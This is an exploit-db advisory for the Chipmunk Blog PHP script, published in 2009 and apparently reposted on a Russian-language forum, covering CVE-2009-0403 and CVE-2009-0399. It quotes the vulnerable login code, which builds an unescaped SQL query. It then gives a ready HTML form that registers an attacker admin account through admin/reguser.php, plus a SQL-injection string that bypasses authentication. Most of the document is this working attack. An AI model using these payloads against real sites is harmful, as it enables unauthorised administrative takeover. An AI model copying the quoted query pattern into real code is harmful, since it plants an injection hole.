- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7894
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0403 cve-2009-0399
- Дата публикации
- 2009-01-28
Код:
#########################################################################################
[0x01] Informations:
Script : Chipmunk Blog
Download : http://www.chipmunk-scripts.com/blog/blog.zip
Vulnerability : Add Admin Exploit\Auth Bypass
Author : x0r
Contact : [email protected] \ [email protected]
Website : NULL
#########################################################################################
[0x02] Bug: \admin\reguser.php \admin\authenticate.php
if (isset($_POST['submit'])) // name of submit button
{
$username=$_POST['username'];
$password=$_POST['password'];
$password=md5($password);
$getadmin="SELECT * from bl_admin where username='$username' and
password='$password'";
$getadmin2=mysql_query($getadmin) or die("Could not get admin");
#########################################################################################
[0x03] Exploit:
Add Admin:
<html>
<head>
<title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title>
</head>
<body>
<form action=http://xxxxxxx/blog/admin/reguser.php method=post>
Username:<br>
<input type=text name='username' value='x0r' size="20"><br>
Password:<br>
<input type=text name='password' value='h4x0rz' size="20"><br>
<input type="text" name="pass2" value='h4x0rz' size="15"><br>
<input type=submit name='submit' value='submit'><br>
</form>
</body>
</html>
Exploit2: admin ' or ' 1=1--
#########################################################################################
# milw0rm.com [2009-01-28]- Источник
- www.exploit-db.com
